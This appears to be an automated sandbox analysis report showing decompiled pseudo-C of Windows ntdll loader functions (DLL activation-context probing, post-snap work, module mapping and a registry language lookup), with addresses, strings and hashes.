							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x3528464; // 0x73b80110
					 *0x352b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E03469B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x3525780 & 0x00000005) != 0) {
						_push(_t49);
						E034B5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                          0x03468e0f
                                                          0x03468e16
                                                          0x03468e19
                                                          0x03468e1b
                                                          0x03468e21
                                                          0x03468e7f
                                                          0x03468e85
                                                          0x034a9354
                                                          0x034a936c
                                                          0x034a9371
                                                          0x034a937b
                                                          0x034a9381
                                                          0x034a9381
                                                          0x034a937b
                                                          0x03468e9d
                                                          0x03468e9d
                                                          0x03468e29
                                                          0x03468e2c
                                                          0x03468e38
                                                          0x03468e3e
                                                          0x03468e43
                                                          0x03468eb5
                                                          0x03468eb9
                                                          0x034a92aa
                                                          0x034a92af
                                                          0x034a92e8
                                                          0x034a92e8
                                                          0x034a92af
                                                          0x03468eb9
                                                          0x03468e45
                                                          0x03468e53
                                                          0x03468e5b
                                                          0x03468e5f
                                                          0x03468e78
                                                          0x03468e78
                                                          0x03468e7d
                                                          0x03468ec3
                                                          0x03468ecd
                                                          0x03468ed2
                                                          0x03468ed2
                                                          0x03468ec5
                                                          0x03468ec5
                                                          0x00000000
                                                          0x03468e7d
                                                          0x03468e67
                                                          0x03468ea4
                                                          0x034a931a
                                                          0x00000000
                                                          0x00000000
                                                          0x034a9320
                                                          0x03468ea4
                                                          0x03468e70
                                                          0x034a9325
                                                          0x034a9340
                                                          0x034a9345
                                                          0x034a9345
                                                          0x03468e76
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          Strings
                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 034A932A
                                                          • LdrpFindDllActivationContext, xrefs: 034A9331, 034A935D
                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 034A9357
                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 034A933B, 034A9367
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 0-3779518884
                                                          • Opcode ID: 32de3678384e706ed3af880af5c0652bc707af48a7646977aa9f90fab6fd9fc3
                                                          • Instruction ID: 791100abb1a2b725f6702a2b4048203f0ea33eacd9edbc60a297984138c0ec1c
                                                          • Opcode Fuzzy Hash: 32de3678384e706ed3af880af5c0652bc707af48a7646977aa9f90fab6fd9fc3
                                                          • Instruction Fuzzy Hash: DD41D532A407159FDB35EF58C849A7FB3B8AB15244F0D45ABE814DF251E760AD81C28B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03448794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
                                                          			E03448794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0344934A() != 0) {
								_t159 = E034BA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x3525780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E034B5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x3525780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0344849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E03448999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E03448999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x3525c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x3525c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E03452280(_t92, 0x35286cc);
															_t94 = E03509DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E034661A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x3525c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E03448A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x3525c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x3525c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0347F380(_t136, 0x3411184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E03452280(_t108, 0x35286cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E034661A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E03509D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0344FFB0(_t118, _t156, 0x35286cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03479A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                          0x03448799
                                                          0x0344879d
                                                          0x034487a1
                                                          0x034487a3
                                                          0x034487a8
                                                          0x034487c3
                                                          0x034487c3
                                                          0x034487c8
                                                          0x034487d1
                                                          0x034487d4
                                                          0x034487d8
                                                          0x034487e5
                                                          0x034487ec
                                                          0x03499bfe
                                                          0x03499c00
                                                          0x03499c02
                                                          0x03499c08
                                                          0x03499c0d
                                                          0x03499c0f
                                                          0x03499c14
                                                          0x03499c2d
                                                          0x03499c32
                                                          0x03499c37
                                                          0x03499c3a
                                                          0x03499c3c
                                                          0x03499c42
                                                          0x03499c42
                                                          0x03499c3c
                                                          0x03499c02
                                                          0x034487da
                                                          0x034487df
                                                          0x034487e3
                                                          0x00000000
                                                          0x00000000
                                                          0x034487e3
                                                          0x034487f2
                                                          0x00000000
                                                          0x034487fb
                                                          0x034487fd
                                                          0x034487fe
                                                          0x0344880e
                                                          0x0344880f
                                                          0x03448810
                                                          0x03448814
                                                          0x0344881a
                                                          0x0344881c
                                                          0x0344881f
                                                          0x03448821
                                                          0x03448822
                                                          0x03448824
                                                          0x03448826
                                                          0x0344882c
                                                          0x0344882e
                                                          0x03499c48
                                                          0x03499c48
                                                          0x03448834
                                                          0x03448834
                                                          0x03448837
                                                          0x00000000
                                                          0x00000000
                                                          0x03448837
                                                          0x0344882e
                                                          0x0344883d
                                                          0x03448840
                                                          0x03448843
                                                          0x03448846
                                                          0x03448849
                                                          0x0344884c
                                                          0x0344884e
                                                          0x03448850
                                                          0x03448852
                                                          0x03448854
                                                          0x03448857
                                                          0x034488b4
                                                          0x034488b6
                                                          0x034488b6
                                                          0x03448859
                                                          0x03448859
                                                          0x03448859
                                                          0x03448861
                                                          0x03448866
                                                          0x0344886a
                                                          0x0344893d
                                                          0x03448941
                                                          0x00000000
                                                          0x03448947
                                                          0x03448947
                                                          0x0344894a
                                                          0x0344894c
                                                          0x00000000
                                                          0x03448952
                                                          0x03448955
                                                          0x0344895a
                                                          0x0344895d
                                                          0x0344895d
                                                          0x0344895f
                                                          0x03448961
                                                          0x03448961
                                                          0x03448968
                                                          0x00000000
                                                          0x00000000
                                                          0x0344896a
                                                          0x0344896b
                                                          0x0344896e
                                                          0x00000000
                                                          0x03448970
                                                          0x03448970
                                                          0x03448970
                                                          0x03448970
                                                          0x03448972
                                                          0x03448972
                                                          0x03448974
                                                          0x00000000
                                                          0x0344897a
                                                          0x0344897a
                                                          0x0344897d
                                                          0x00000000
                                                          0x03448983
                                                          0x03499c65
                                                          0x03499c6d
                                                          0x03499c72
                                                          0x03499c75
                                                          0x03499c75
                                                          0x03499c82
                                                          0x03499c86
                                                          0x03499c87
                                                          0x03499c88
                                                          0x03499c89
                                                          0x03499c8c
                                                          0x03499c90
                                                          0x03499c95
                                                          0x03499c97
                                                          0x03499ca0
                                                          0x03499ca3
                                                          0x03499ca9
                                                          0x03499ca9
                                                          0x00000000
                                                          0x03499ca9
                                                          0x03499ca3
                                                          0x00000000
                                                          0x03499c97
                                                          0x0344897d
                                                          0x00000000
                                                          0x03448974
                                                          0x03448988
                                                          0x03448992
                                                          0x03448996
                                                          0x00000000
                                                          0x03448996
                                                          0x0344894c
                                                          0x00000000
                                                          0x03448870
                                                          0x0344887b
                                                          0x0344887d
                                                          0x0344887f
                                                          0x03448881
                                                          0x03448884
                                                          0x03448884
                                                          0x03448886
                                                          0x03448889
                                                          0x0344888c
                                                          0x0344888e
                                                          0x03448891
                                                          0x03448891
                                                          0x03448898
                                                          0x00000000
                                                          0x00000000
                                                          0x0344889a
                                                          0x0344889b
                                                          0x0344889e
                                                          0x00000000
                                                          0x00000000
                                                          0x034488a0
                                                          0x034488a8
                                                          0x034488b0
                                                          0x034488b2
                                                          0x034488d3
                                                          0x034488d5
                                                          0x00000000
                                                          0x034488d7
                                                          0x034488db
                                                          0x034488dc
                                                          0x034488e0
                                                          0x034488e8
                                                          0x034488ee
                                                          0x034488f0
                                                          0x034488f3
                                                          0x034488fc
                                                          0x03448901
                                                          0x03448906
                                                          0x0344890c
                                                          0x0344890c
                                                          0x0344890f
                                                          0x03448916
                                                          0x03448917
                                                          0x03448918
                                                          0x03448919
                                                          0x0344891a
                                                          0x0344891f
                                                          0x03448921
                                                          0x03499c52
                                                          0x03499c55
                                                          0x03499c5b
                                                          0x03499cac
                                                          0x03499cc0
                                                          0x03499cc0
                                                          0x03499c55
                                                          0x03448927
                                                          0x03448927
                                                          0x0344892f
                                                          0x03448933
                                                          0x00000000
                                                          0x034488f5
                                                          0x034488f5
                                                          0x00000000
                                                          0x034488f7
                                                          0x034488f7
                                                          0x034488fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034488fa
                                                          0x034488f5
                                                          0x034488f3
                                                          0x00000000
                                                          0x034488d5
                                                          0x00000000
                                                          0x034488b2
                                                          0x034488c9
                                                          0x00000000
                                                          0x034488c9
                                                          0x0344887f
                                                          0x0344886a
                                                          0x03448857
                                                          0x03448852
                                                          0x034488bf
                                                          0x034488bf
                                                          0x034487aa
                                                          0x034487ad
                                                          0x034487ae
                                                          0x034487b4
                                                          0x034487b5
                                                          0x034487b6
                                                          0x034487b8
                                                          0x034487bd
                                                          0x034487c1
                                                          0x034487f4
                                                          0x034487fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034487c1
                                                          0x00000000

                                                          Strings
                                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03499C18
                                                          • LdrpDoPostSnapWork, xrefs: 03499C1E
                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 03499C28
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 0-1948996284
                                                          • Opcode ID: d123a2a0abd08a5c0e3c012ff838c0d2ec86c88431b7a862fa77c01174f70582
                                                          • Instruction ID: f1bee02aa893af5eef03c59845c7cfee545364db8c82baa264c430b5f902dc65
                                                          • Opcode Fuzzy Hash: d123a2a0abd08a5c0e3c012ff838c0d2ec86c88431b7a862fa77c01174f70582
                                                          • Instruction Fuzzy Hash: A191F231A006169FEF18DF59C8819BAB7B5FF85310B1841BFE905AF251E732E905CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03447E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E03447E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0344CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0343C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x3525780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E034B5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x3525780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E03457D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03457D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E034B7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E03457D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03457D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E034B7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0346A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0343B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                          0x03447e4c
                                                          0x03447e50
                                                          0x03447e55
                                                          0x03447e58
                                                          0x03447e5d
                                                          0x03447e71
                                                          0x03447f33
                                                          0x03447e77
                                                          0x03447e77
                                                          0x03447e79
                                                          0x03447e79
                                                          0x03447e7e
                                                          0x03447f45
                                                          0x03499848
                                                          0x00000000
                                                          0x03499848
                                                          0x03447f4e
                                                          0x03447f53
                                                          0x03447f5a
                                                          0x00000000
                                                          0x00000000
                                                          0x0349985a
                                                          0x03499862
                                                          0x03499866
                                                          0x00000000
                                                          0x0349986c
                                                          0x00000000
                                                          0x0349986c
                                                          0x03447e84
                                                          0x03447e84
                                                          0x03447e8d
                                                          0x03499871
                                                          0x03447eb8
                                                          0x03447ec0
                                                          0x03447ec0
                                                          0x03447e9a
                                                          0x0349987e
                                                          0x00000000
                                                          0x00000000
                                                          0x03499884
                                                          0x0349988b
                                                          0x034998a7
                                                          0x034998ac
                                                          0x034998b1
                                                          0x034998b6
                                                          0x034998b8
                                                          0x034998b8
                                                          0x034998b9
                                                          0x00000000
                                                          0x034998b9
                                                          0x03447ea0
                                                          0x03447ea7
                                                          0x00000000
                                                          0x00000000
                                                          0x03447eac
                                                          0x03447eb1
                                                          0x03447ec6
                                                          0x03447ed0
                                                          0x034998cc
                                                          0x03447ed6
                                                          0x03447ed6
                                                          0x03447ed6
                                                          0x03447ede
                                                          0x03447ee3
                                                          0x034998e3
                                                          0x034998f0
                                                          0x03499902
                                                          0x034998f2
                                                          0x034998fb
                                                          0x034998fb
                                                          0x03499907
                                                          0x0349991d
                                                          0x0349991d
                                                          0x03499907
                                                          0x034998e3
                                                          0x03447ef0
                                                          0x03447f14
                                                          0x03447f14
                                                          0x03447f1e
                                                          0x03499946
                                                          0x03447f24
                                                          0x03447f24
                                                          0x03447f24
                                                          0x03447f2c
                                                          0x0349996a
                                                          0x03499975
                                                          0x03499975
                                                          0x0349997e
                                                          0x03499993
                                                          0x03499993
                                                          0x0349997e
                                                          0x00000000
                                                          0x03447ef2
                                                          0x03447efc
                                                          0x03447f0a
                                                          0x03447f0e
                                                          0x03499933
                                                          0x00000000
                                                          0x03499933
                                                          0x00000000
                                                          0x03447f0e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03447eb1

                                                          Strings
                                                          • LdrpCompleteMapModule, xrefs: 03499898
                                                          • minkernel\ntdll\ldrmap.c, xrefs: 034998A2
                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 03499891
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                          • API String ID: 0-1676968949
                                                          • Opcode ID: 23b7559aa90fa513a5b299ddcc03f88ecdc9ea8807d7222b0e2eb226e0973455
                                                          • Instruction ID: 85fa55154a982c4d7a61f7111f2a7700a197628b8e6c430d07c6f7a7224f5708
                                                          • Opcode Fuzzy Hash: 23b7559aa90fa513a5b299ddcc03f88ecdc9ea8807d7222b0e2eb226e0973455
                                                          • Instruction Fuzzy Hash: 9751E1356007459FFB21CB59C944B2ABFA4EB45310F2806ABE8619F7D1D734ED02CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0343E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E0343E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0343F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E034795D0();
						}
						if(_t78 != 0) {
							L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0347FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0347BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03479600();
					if(_t97 < 0) {
						goto L6;
					}
					E0347BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0343F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0347BB40(_t83, _t102 + 0x24, _t78);
								if(L034443C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0347BB40(_t84, _t102 + 0x24, _t94);
									if(L034443C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                          0x0343e620
                                                          0x0343e628
                                                          0x0343e62f
                                                          0x0343e631
                                                          0x0343e635
                                                          0x0343e637
